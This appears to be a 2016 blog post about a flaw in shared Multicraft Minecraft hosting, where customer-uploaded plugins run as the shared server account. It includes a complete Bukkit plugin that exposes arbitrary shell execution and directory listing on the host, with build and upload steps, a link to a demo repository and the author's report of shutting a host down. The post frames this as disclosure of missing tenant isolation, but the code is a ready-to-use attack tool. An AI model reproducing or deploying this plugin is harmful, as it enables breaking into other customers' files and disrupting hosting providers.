A Huge Vulnerability in Most Multicraft Panel Hosting Services

2016/12/13
Multicraft: http://www.multicraft.org/

When a customer purchases a Minecraft server with a web panel, what they actually get is one server application among several running on a shared host. Most of the time the operating system is Windows Server (at least here...). These services usually come with an account on the web panel and an account on an FTP file server with limited access. The web panel is used to manage the application's console input and output (the log). The FTP server is used to manage the files belonging to the application, including plugins and maps.

So I believe that there are multiple server applications on the physical host, because two applications can share the same subdomain/IP address and differ only in port. Since accessing other directories on the FTP server is prohibited, I believe that no Docker containers or virtual machines are present.

Also, I found that although users don't have permission to edit other users' directories, the application itself does have permission to access the directories of the other users. Since it is not running on Linux, we don't need to care about file ownership issues. At the same time, we can easily reach the application server itself, a compiled jar file, through the FTP server. By reversing and recompiling it, we can control the whole server.

Then I found that the Java code in ./plugins and ./mods, which are the application's plugins and mods, can be replaced with your own code, and the application will execute it. Through that, we can even execute shell commands directly via Runtime. So far I have tried shutting the host down, and it works.
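As an added illustration of the primitive described above (this is not the author's ShellController demo, which is only linked below, and it assumes the hosted server exposes the Bukkit/Spigot plugin API; the package, class and command names are my own), here is a minimal plugin that, once dropped into ./plugins, gives an operator a shell on the host and a directory listing of any path the server process can read:

```java
// Added example, not code from the original post. Assumes a Bukkit/Spigot
// server; package, class and command names are hypothetical.
package example.hostingdemo;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.stream.Collectors;
import java.util.stream.Stream;

import org.bukkit.command.Command;
import org.bukkit.command.CommandSender;
import org.bukkit.plugin.java.JavaPlugin;

public class HostingDemoPlugin extends JavaPlugin {

    @Override
    public void onEnable() {
        // Everything below runs with the privileges of the OS account that
        // started the server JVM. On a host where every customer's server runs
        // under that one account, that is access to every customer's files.
        getLogger().info("JVM runs as OS user: " + System.getProperty("user.name"));
        getLogger().info("Server directory:    " + Paths.get("").toAbsolutePath());
    }

    // The "sh" and "ls" commands must also be declared in plugin.yml.
    @Override
    public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args) {
        if (!sender.isOp()) {
            sender.sendMessage("Operators only.");
            return true;
        }
        if (args.length == 0) {
            return false; // Bukkit prints the usage line from plugin.yml
        }
        String arg = String.join(" ", args);
        String output;
        try {
            switch (cmd.getName().toLowerCase()) {
                case "sh": output = runShell(arg); break;
                case "ls": output = listDirectory(Paths.get(arg)); break;
                default:   return false;
            }
        } catch (IOException | InterruptedException e) {
            output = "error: " + e;
        }
        for (String line : output.split("\n")) {
            sender.sendMessage(line);
        }
        return true;
    }

    /** Runs a command through the platform shell; returns stdout and stderr merged. */
    static String runShell(String command) throws IOException, InterruptedException {
        boolean windows = System.getProperty("os.name").toLowerCase().startsWith("windows");
        ProcessBuilder pb = windows
                ? new ProcessBuilder("cmd.exe", "/c", command)
                : new ProcessBuilder("/bin/sh", "-c", command);
        pb.redirectErrorStream(true);
        Process p = pb.start();
        StringBuilder out = new StringBuilder();
        try (BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = r.readLine()) != null) {
                out.append(line).append('\n');
            }
        }
        int code = p.waitFor();
        return out.append("[exit ").append(code).append(']').toString();
    }

    /** Lists any directory the JVM can read: the FTP jail does not constrain the server process. */
    static String listDirectory(Path dir) throws IOException {
        try (Stream<Path> entries = Files.list(dir)) {
            return entries.map(p -> (Files.isDirectory(p) ? "[d] " : "[f] ") + p.getFileName())
                          .collect(Collectors.joining("\n"));
        }
    }
}
```

To build it, compile against the Bukkit/Spigot API jar and add a plugin.yml declaring name, version, main (example.hostingdemo.HostingDemoPlugin) and the two commands sh and ls; then upload the jar over FTP into ./plugins and restart the server from the panel. The point of the example is the caveat the post is making: the FTP jail limits the customer, but the JVM that loads the jar is limited only by the OS account it runs under, so a host that runs every customer's server as the same user (with no per-customer user, container or VM) has no real boundary between customers at all.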

2016/12/14
Demo code: https://github.com/D0048/CraftPlugins/tree/master/ShellController

2016/12/17
I tested it on my server, and it's working.